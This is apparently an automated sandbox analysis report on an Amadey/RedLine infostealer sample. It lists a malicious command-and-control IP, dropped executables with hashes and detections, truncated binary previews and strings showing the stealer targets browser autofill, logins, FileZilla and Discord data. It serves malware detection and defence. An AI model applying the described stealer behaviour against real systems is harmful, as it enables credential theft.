                                                                                                                                                              World Map of Contacted IPs

                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                              • 75% < No. of IPs

                                                                                                                                                              Public IPs

                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                              83.97.73.122
                                                                                                                                                              		unknownGermany
                                                                                                                                                              		25206UNACS-AS-BG8000BurgasBGtrue

                                                                                                                                                              General Information

                                                                                                                                                              Joe Sandbox Version:37.1.0 Beryl
                                                                                                                                                              Analysis ID:876163
                                                                                                                                                              Start date and time:2023-05-26 11:39:25 +02:00
                                                                                                                                                              Joe Sandbox Product:CloudBasic
                                                                                                                                                              Overall analysis duration:0h 10m 12s
                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                              Report type:full
                                                                                                                                                              Cookbook file name:default.jbs
                                                                                                                                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                              Number of analysed new started processes analysed:14
                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                              Technologies:
                                                                                                                                                              • HCA enabled
                                                                                                                                                              • EGA enabled
                                                                                                                                                              • HDC enabled
                                                                                                                                                              • AMSI enabled
                                                                                                                                                              Analysis Mode:default
                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                              Sample file name:qu0t4ukLoN.exe
                                                                                                                                                              Original Sample Name:1df346c349b9b71b11825690be73e635.exe
                                                                                                                                                              Detection:MAL
                                                                                                                                                              Classification:mal100.troj.spyw.evad.winEXE@15/8@0/1
                                                                                                                                                              EGA Information:
                                                                                                                                                              • Successful, ratio: 80%
                                                                                                                                                              HDC Information:
                                                                                                                                                              • Successful, ratio: 99.8% (good quality ratio 96.9%)
                                                                                                                                                              • Quality average: 82.6%
                                                                                                                                                              • Quality standard deviation: 24.1%
                                                                                                                                                              HCA Information:
                                                                                                                                                              • Successful, ratio: 99%
                                                                                                                                                              • Number of executed functions: 195
                                                                                                                                                              • Number of non-executed functions: 124
                                                                                                                                                              Cookbook Comments:
                                                                                                                                                              • Found application associated with file extension: .exe
                                                                                                                                                              • Override analysis time to 240s for rundll32

                                                                                                                                                              Warnings

                                                                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe
                                                                                                                                                              • Execution Graph export aborted for target b7687179.exe, PID 3320 because it is empty
                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                              Simulations

                                                                                                                                                              Behavior and APIs

                                                                                                                                                              TimeTypeDescription
                                                                                                                                                              11:40:47API Interceptor11x Sleep call for process: b7687179.exe modified

                                                                                                                                                              Joe Sandbox View / Context

                                                                                                                                                              IPs

                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                              83.97.73.122MAlGsU76Zn.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                AZ9BKcFuj1.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                  Zhk20TdT2T.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                    uSLVyTX50O.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                      WXbyOlbuPM.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                        h4fszh8pqX.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                          CJD59zQ4nR.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                            buHYWM84Ms.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                              fhfX7tqGBO.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                kcvrQqGipY.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                  oH8jEPqwZq.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                    xw28YF2KOq.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                      pWmw92koYk.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                        HLuHAhT1Fe.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                          9k9p870uag.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                            jkSYUz3BfW.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                              bgYQIBRdcX.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                                FKlCx8EYC8.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                                  UfFnLYk36X.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                                    B0DAZ0q0zH.exeGet hashmaliciousAmadey, RedLineBrowse

                                                                                                                                                                                                      Domains

                                                                                                                                                                                                      No context

                                                                                                                                                                                                      ASNs

                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                      UNACS-AS-BG8000BurgasBGMAlGsU76Zn.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                                      • 83.97.73.122
                                                                                                                                                                                                      AZ9BKcFuj1.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                                      • 83.97.73.122
                                                                                                                                                                                                      Zhk20TdT2T.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                                      • 83.97.73.122
                                                                                                                                                                                                      uSLVyTX50O.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                                      • 83.97.73.122
                                                                                                                                                                                                      WXbyOlbuPM.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                                      • 83.97.73.122
                                                                                                                                                                                                      h4fszh8pqX.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                                      • 83.97.73.122
                                                                                                                                                                                                      CJD59zQ4nR.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                                      • 83.97.73.122
                                                                                                                                                                                                      buHYWM84Ms.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                                      • 83.97.73.122
                                                                                                                                                                                                      fhfX7tqGBO.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                                      • 83.97.73.122
                                                                                                                                                                                                      kcvrQqGipY.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                                      • 83.97.73.122
                                                                                                                                                                                                      oH8jEPqwZq.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                                      • 83.97.73.122
                                                                                                                                                                                                      xw28YF2KOq.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                                      • 83.97.73.122
                                                                                                                                                                                                      pWmw92koYk.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                                      • 83.97.73.122
                                                                                                                                                                                                      HLuHAhT1Fe.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                                      • 83.97.73.122
                                                                                                                                                                                                      9k9p870uag.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                                      • 83.97.73.122
                                                                                                                                                                                                      jkSYUz3BfW.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                                      • 83.97.73.122
                                                                                                                                                                                                      bgYQIBRdcX.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                                      • 83.97.73.122
                                                                                                                                                                                                      FKlCx8EYC8.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                                      • 83.97.73.122
                                                                                                                                                                                                      UfFnLYk36X.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                                      • 83.97.73.122
                                                                                                                                                                                                      B0DAZ0q0zH.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                                      • 83.97.73.122

                                                                                                                                                                                                      JA3 Fingerprints

                                                                                                                                                                                                      No context

                                                                                                                                                                                                      Dropped Files

                                                                                                                                                                                                      No context

                                                                                                                                                                                                      Created / dropped Files

                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AppLaunch.exe.log

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                                                                                                                      File Type:CSV text
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):226
                                                                                                                                                                                                      Entropy (8bit):5.3467126928258955
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2LDY3U21v:Q3La/KDLI4MWuPk21v
                                                                                                                                                                                                      MD5:DD8B7A943A5D834CEEAB90A6BBBF4781
                                                                                                                                                                                                      SHA1:2BED8D47DF1C0FF76B40811E5F11298BD2D06389
                                                                                                                                                                                                      SHA-256:E1D0A304B16BE51AE361E392A678D887AB0B76630B42A12D252EDC0484F0333B
                                                                                                                                                                                                      SHA-512:24167174EA259CAF57F65B9B9B9C113DD944FC957DB444C2F66BC656EC2E6565EFE4B4354660A5BE85CE4847434B3BDD4F7E05A9E9D61F4CC99FF0284DAA1C87
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Reputation:high, very likely benign file
                                                                                                                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..

                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\b7687179.exe.log

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exe
                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):2843
                                                                                                                                                                                                      Entropy (8bit):5.3371553026862095
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:48:MxHKXeHKlEHU0YHKhQnouHIWUfHKhBHKdHKBfHK5AHKzvQTHmtHoxHImHK1HG1qX:iqXeqm00YqhQnouOqLqdqNq2qzcGtIxk
                                                                                                                                                                                                      MD5:EBF4AEAE98F14F4480152E9EDBB24123
                                                                                                                                                                                                      SHA1:21F9D2A708D7709FECD4A837536B588D953FA6FC
                                                                                                                                                                                                      SHA-256:6278F6B29B841FD578D1F01D6BA7CD9FD7A3D977BE1D503A2E19C9B2017EA1B7
                                                                                                                                                                                                      SHA-512:F7A1EEA0AB96145F8AA49D43CC8C8E171137FA89E4780DCF7FC236488747518C42BCABED71CB8CB6DAF35DDF701CB1BC01A122A4E8E553E028DAA0DC0287FDC9
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\820a27781e8540ca263d835ec155f1a5\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\889128adc9a7c9370e5e293f65060164\PresentationFramework.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Wi

                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\IXP000.TMP\d4851931.exe

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Users\user\Desktop\qu0t4ukLoN.exe
                                                                                                                                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):324094
                                                                                                                                                                                                      Entropy (8bit):7.54372131384144
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:6144:xcDje7OxoovhLLDLjC4d8QvV+hdaLB4rOlEnQ2m3bR:iDyOVvhLLH24dBvmdaLBzEnQ2
                                                                                                                                                                                                      MD5:AAE88589C2939D21D935B6DE0E73870B
                                                                                                                                                                                                      SHA1:AA7CB7CFA1BCB86B52E105EA7D8D5D77A4013325
                                                                                                                                                                                                      SHA-256:F6A7AE755C44744C961C5C054EE17E7E1209E9E97FBDA412BC406FBE61E2A90F
                                                                                                                                                                                                      SHA-512:70AC1FC2670E5C1098E7994FD95751302619A800BF15C42CF065AC8E86E7B799CF6044D4C7DB96BFA9B0605794F94B15EE34BC3E220828503BAE33F852537AA5
                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........0..c..c..c..dc..c..uc..c..rcW..c.b.c..c...c..c..c...c..uc..c..ec..c..`c..cRich..c........PE..L....vpd............................Bl............@..........................................................................S..<.......(................S...........................................=..@...............X............................text....e.......f.................. ..`.OuoYr...............j.............. ..`.rdata...K.......L..................@..@.data...h{...`...\...:..............@....rsrc...(...........................@..@................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\IXP000.TMP\v7020033.exe

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Users\user\Desktop\qu0t4ukLoN.exe
                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):457216
                                                                                                                                                                                                      Entropy (8bit):7.786373811719987
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:6144:Kpy+bnr+5p0yN90QEmoGpHE2TQYNCZje6TsbzxxTgINo2hUVE2MyrOGdKbert:TMrRy900oGpxTQaCjixxTy2bXat
                                                                                                                                                                                                      MD5:A9A0FDF699EB764206C59FF3CA3FAC53
                                                                                                                                                                                                      SHA1:2578C481B0D67C710FC64163712021043D49CAA8
                                                                                                                                                                                                      SHA-256:B41DD10009E2BD916D9C7AFAB7D3D9E673D4E111278EFFDD05D44F68E9F84FE4
                                                                                                                                                                                                      SHA-512:2D3784C01F16E11BA8D2DAC7D91BD6FCB3B1D5095578D4C6C82A788CFDAF278D18E31B1FF5FB284AA593AD96F39CA8789BF182FE030D6318CA080072CE3191E8
                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K..K..K...N..K...H..K...O..K...J..K..J...K...C..K.....K...I..K.Rich..K.........PE..L....`.b.................d..........`j............@..........................P............@...... ......................................xs...................@..........T...............................@............................................text....c.......d.................. ..`.data...H............h..............@....idata..R............j..............@..@.rsrc............t...|..............@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\IXP001.TMP\c6803120.exe

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\v7020033.exe
                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):210873
                                                                                                                                                                                                      Entropy (8bit):6.33924537885446
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3072:meTRJ0kHbnpN23kQKp5XzutZXKGrpeN84LuZAIybiy3xEfbi:FTR2AnpN2wDurXBeBuZAIMEj
                                                                                                                                                                                                      MD5:3ED5D8F4F6620DE95B8EF02F28C9C5E9
                                                                                                                                                                                                      SHA1:EEFDA1DF3A3297B00D08475B93084495ECB7FD0A
                                                                                                                                                                                                      SHA-256:3E2696E2C4CCC222063F06F6031DC8DACF54A3B0D923650135AF17C74789738A
                                                                                                                                                                                                      SHA-512:C4CB8AFE75866A9D7346BD9241D9119B8478259A037A39663EC0A507E5ABE2F95B10393E412BA2DC15A93316F3DE0A4E043EBC1A53E298785DB431FC70B91D4C
                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                      Yara Hits:
                                                                                                                                                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\c6803120.exe, Author: Joe Security
                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 69%
                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......]..M.o...o...o..B....o..B....o..B....o.......o.......o......5o..B....o...o...o.......o....m..o.......o..Rich.o..................PE..L...opod.................v...........V............@.......................................@.....................................d....@.......................P... ..`...p...................t...........@............................................text....t.......v.................. ..`.rdata..t|.......~...z..............@..@.data...h$..........................@....rsrc........@......................@..@.reloc... ...P..."..................@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\IXP001.TMP\v6434086.exe

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\v7020033.exe
                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):281600
                                                                                                                                                                                                      Entropy (8bit):7.572515848405127
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:6144:KTy+bnr+0p0yN90QEsZjeETsbzxgggINo2wUME2aR:tMr0y90elixggy2P
                                                                                                                                                                                                      MD5:4D67FD4D3D62A45215D1FBDF9CA87397
                                                                                                                                                                                                      SHA1:FB686838CEC8323CE6EC87A133C48E9723C3DED5
                                                                                                                                                                                                      SHA-256:0C36FA81B63A4C7D12FA7A0CF055BACCA0C423E7DFEDAD6EB55281C914CA0003
                                                                                                                                                                                                      SHA-512:D3718984BC81E18624EE801AA01F5B482DDBB2551C3AB25772F88947BAADB637733F633F77D376EF46126C4FDE6629E9DE85D898425AF655E817C0466CB94574
                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K..K..K...N..K...H..K...O..K...J..K..J...K...C..K.....K...I..K.Rich..K.........PE..L....`.b.................d..........`j............@..................................C....@...... ......................................................................T...............................@............................................text....c.......d.................. ..`.data...H............h..............@....idata..R............j..............@..@.rsrc................|..............@..@.reloc...............B..............@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exe

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\IXP001.TMP\v6434086.exe
                                                                                                                                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):186366
                                                                                                                                                                                                      Entropy (8bit):6.898951882290762
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3072:lAZJrtymkLKh/gH2TPDXD1qk+yxXeOx5ITx:l+yvKdFPDXDM2D
                                                                                                                                                                                                      MD5:1BE37E0816A88025F557178CA7FC03C8
                                                                                                                                                                                                      SHA1:BE1947797AC7B4CDED7F3524B5AD1CD6A4B28CFC
                                                                                                                                                                                                      SHA-256:F8DA12B0DDF6695F8669679E0148756B3676E55D2F1C9121E5A04DDAF78C6E6B
                                                                                                                                                                                                      SHA-512:E3D189AE5918D6DC9128B8564FD90DE5FCDC2DD9BFDE5C3BFB2130BBB739CB348DD2A9B8B08D84D322C41A85F6C3409EA3C78173CA3894606B71DAF4584D8DFB
                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 39%
                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........0..c..c..c..dc..c..uc..c..rcW..c.b.c..c...c..c..c...c..uc..c..ec..c..`c..cRich..c........PE..L....vpd............................Bl............@..........................................................................S..<.......(................S...........................................=..@...............X............................text....e.......f.................. ..`.miJql...............j.............. ..`.rdata...K.......L..................@..@.data...hc...`...D...8..............@....rsrc...(............|..............@..@................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exe

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\IXP001.TMP\v6434086.exe
                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):148489
                                                                                                                                                                                                      Entropy (8bit):5.412914556371622
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3072:LV+m5chQmRSZsBxioW/JruNFmRsZhCZR8e8ha:LjEx6U3ZhC7
                                                                                                                                                                                                      MD5:927C5B1DEF98D855184A0ED56D8A2787
                                                                                                                                                                                                      SHA1:EEB57B0120D4C1F6539CDC372A5E71A8947FDE3C
                                                                                                                                                                                                      SHA-256:1A0C4908C739CF9C405A050A6FE29214525F46350E7BA49BD26F9BD7E60F6BC9
                                                                                                                                                                                                      SHA-512:93957AD10BE2B54D2E5AB9E40B3C1A7767C9295A74E854A98FB9EDBD42D7F32C2F463913A0A7832C73697A3264F966A7E45713CBFEA8326A306DFED80FF9A1CB
                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                      Yara Hits:
                                                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exe, Author: Joe Security
                                                                                                                                                                                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exe, Author: ditekSHen
                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 78%
                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...!1................0.................. ........@.. ....................................@.....................................K.......N............................................................................ ............... ..H............text........ ...................... ..`.rsrc...N...........................@..@.reloc...............B..............@..B........................H.......X...H.......u...................................................a.u.t.o.f.i.l.l.P.r.o.f.i.l.e.s.T.o.t.a.l. .o.f. .R.A.M.V.P.E.n.t.i.t.y.1.2.N...A.p.p.D.a.t.a.\.L.o.c.a.l.\.....[.^.\.u.0.0.2.0.-.\.u.0.0.7.F.].U.N.K.N.O.W.N...L.o.c.a.l. .S.t.a.t.e...P.r.o.c.e.s.s.I.d.......1.*...1.l.1.d.1.b.......P.r.o.f.i.l.e._.%.a.p.p.d.a.t.a.%.\.....l.o.g.i.n.s.....{.0.}.\.F.i.l.e.Z.i.l.l.a.\.r.e.c.e.n.t.s.e.r.v.e.r.s...x.m.l...%.a.p.p.d.a.t.a.%.\.d.i.s.c.o.r.d.\.L.o.c.a.l. .S.t.o.r.

                                                                                                                                                                                                      Static File Info

                                                                                                                                                                                                      General

                                                                                                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                      Entropy (8bit):7.902876514651296
                                                                                                                                                                                                      TrID:
                                                                                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                      File name:qu0t4ukLoN.exe
                                                                                                                                                                                                      File size:782336
                                                                                                                                                                                                      MD5:1df346c349b9b71b11825690be73e635
                                                                                                                                                                                                      SHA1:13df3b1666b674f48b1fc2a836fee8ce99381fb5
                                                                                                                                                                                                      SHA256:8e96ef86e327dd3bbc1dab16ce1e57e8f380d9b2df919158f1b6786cfd6f717e
                                                                                                                                                                                                      SHA512:96ffdf2aa68e54bbbfa32659d5683851adba4c50f19ab348233af6a5c284cbbb45b19344cc3668990e51ca66ddfb7c66cf1186d01a793380187a37553967fc8f
                                                                                                                                                                                                      SSDEEP:12288:vMrGy90d/w92r1bjyeDmpa2lixNTy2Iuuomfds+nnII4d22mdQLBNEFz:VyqFvrNTy2dm1zn94Q2mdUS
                                                                                                                                                                                                      TLSH:56F42353A3D82133D8F81F7088FA028B1B397E616A78072B3745A99D1CF3D946576B27
                                                                                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K...K...K...N...K...H...K...O...K...J...K...J...K...C...K.......K...I...K.Rich..K.........PE..L....`.b.................d.

                                                                                                                                                                                                      File Icon

                                                                                                                                                                                                      Icon Hash:3b6120282c4c5a1f

                                                                                                                                                                                                      Static PE Info

                                                                                                                                                                                                      General

                                                                                                                                                                                                      Entrypoint:0x406a60
                                                                                                                                                                                                      Entrypoint Section:.text
                                                                                                                                                                                                      Digitally signed:false
                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                      Time Stamp:0x628D60E2 [Tue May 24 22:49:06 2022 UTC]
                                                                                                                                                                                                      TLS Callbacks:
                                                                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                                                                      OS Version Major:10
                                                                                                                                                                                                      OS Version Minor:0
                                                                                                                                                                                                      File Version Major:10
                                                                                                                                                                                                      File Version Minor:0
                                                                                                                                                                                                      Subsystem Version Major:10
                                                                                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                                                                                      Import Hash:646167cce332c1c252cdcb1839e0cf48

                                                                                                                                                                                                      Entrypoint Preview

                                                                                                                                                                                                      Instruction
                                                                                                                                                                                                      call 00007FEAA9141CD5h
                                                                                                                                                                                                      jmp 00007FEAA91415E5h
                                                                                                                                                                                                      push 00000058h
                                                                                                                                                                                                      push 004072B8h
                                                                                                                                                                                                      call 00007FEAA9141D77h
                                                                                                                                                                                                      xor ebx, ebx
                                                                                                                                                                                                      mov dword ptr [ebp-20h], ebx
                                                                                                                                                                                                      lea eax, dword ptr [ebp-68h]
                                                                                                                                                                                                      push eax
                                                                                                                                                                                                      call dword ptr [0040A184h]
                                                                                                                                                                                                      mov dword ptr [ebp-04h], ebx
                                                                                                                                                                                                      mov eax, dword ptr fs:[00000018h]
                                                                                                                                                                                                      mov esi, dword ptr [eax+04h]
                                                                                                                                                                                                      mov edi, ebx
                                                                                                                                                                                                      mov edx, 004088ACh
                                                                                                                                                                                                      mov ecx, esi
                                                                                                                                                                                                      xor eax, eax
                                                                                                                                                                                                      lock cmpxchg dword ptr [edx], ecx
                                                                                                                                                                                                      test eax, eax
                                                                                                                                                                                                      je 00007FEAA91415FAh
                                                                                                                                                                                                      cmp eax, esi
                                                                                                                                                                                                      jne 00007FEAA91415E9h
                                                                                                                                                                                                      xor esi, esi
                                                                                                                                                                                                      inc esi
                                                                                                                                                                                                      mov edi, esi
                                                                                                                                                                                                      jmp 00007FEAA91415F2h
                                                                                                                                                                                                      push 000003E8h
                                                                                                                                                                                                      call dword ptr [0040A188h]
                                                                                                                                                                                                      jmp 00007FEAA91415B9h
                                                                                                                                                                                                      xor esi, esi
